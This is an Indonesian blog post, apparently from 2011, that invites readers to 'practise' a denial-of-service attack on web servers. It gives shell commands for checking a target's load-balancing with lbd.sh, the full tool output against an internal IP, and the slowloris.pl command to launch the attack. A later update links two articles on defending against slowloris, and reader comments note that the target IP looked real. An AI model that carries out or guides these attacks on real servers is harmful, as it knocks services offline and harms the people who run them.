Friday, October 28, 2011

Serangan Dos kepada Webserver

By kontraktor acp Friday, October 28, 2011
Serangan pada webserver banyak sekali dirasakan oleh pihak pengelola webserver, dan harus bekerja ekstra untuk memperbaiki semua sistem yang telah terkena serangan dos. Pernahkah sahabat melakukan serangan DOS kepada webserver? kalau belum mari kita latihan untuk melakukan serangan dos. Disini saya menggunakan 2 buah file yang pertama lbd.sh yang berguna untuk melihat apakah webserver tersebut menggunakan load-balancing atau tidak, yang kedua adalah slowloris.pl yang digunakan untuk melakukan serangan dos.

1. Download file lbd.sh dan slowloris.pl disini, kemudian unrar.

2. Cek Load-Balancing dari webserver target.
root@bt:~# cd dos
root@bt:~# ./lbd.sh IP_TARGET
Contoh :
root@bt:~/dos# ./lbd.sh 10.3.0.67

lbd - load balancing detector 0.2 - Checks if a given domain uses load-balancing.
                                    Written by Stefan Behte (http://ge.mine.nu)
                                    Proof-of-concept! Might give false positives.

Checking for DNS-Loadbalancing: NOT FOUND
Checking for HTTP-Loadbalancing [Server]: 
 Apache/2.2.0 (Win32) DAV/2 mod_ssl/2.2.0 OpenSSL/0.9.8a mod_autoindex_color PHP/4.4.1-pl1
 NOT FOUND

Checking for HTTP-Loadbalancing [Date]: 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:24, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:25, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:26, 15:16:29, 15:16:29, 15:16:29, 15:16:29, NOT FOUND

Checking for HTTP-Loadbalancing [Diff]: NOT FOUND

10.3.0.67 does NOT use Load-balancing.

root@bt:~/dos#
Jika jawabannya adalah "10.3.0.67 does NOT use Load-balancing." maka kita akan melakukan serangan dos.

3. Serangan Dos.
root@bt:~/dos# ./slowloris.pl -dns IP_TARGET
* Untuk tipe serangan yang lain bisa dilihat didalam file slowloris.pl.

Berikut Videonya.








Update !

Mungkin dengan adanya artikel ini akan membuat beberapa webserver dirugikan, berikut beberapa tutorial yang saya kira dapat memberikan sedikit proteksi pada webservernya.

1. http://www.pc-freak.net/blog/protecting-debian-lenny-against-slowloris-denial-of-service-attack-with-mod_antiloris/
2. http://lwn.net/Articles/338407/

kontraktor acp

Author & Editor

Has laoreet percipitur ad. Vide interesset in mei, no his legimus verterem. Et nostrum imperdiet appellantur usu, mnesarchum referrentur id vim.

2 comments:

  1. AnonymousOctober 28, 2011 at 8:26 AM

    parah ip 10.0.0.. kayaknya ane kenal tuh hahah

    ReplyDelete
  2. kontraktor acpOctober 28, 2011 at 9:17 AM

    Udah ane ganti tuh gan alamat ipnya, maap lupa diganti,haha..

    ReplyDelete

Silahkan meninggalkan pesan jika artikel diatas membantu anda,:)

Subscribe to: Post Comments (Atom)

 
biz.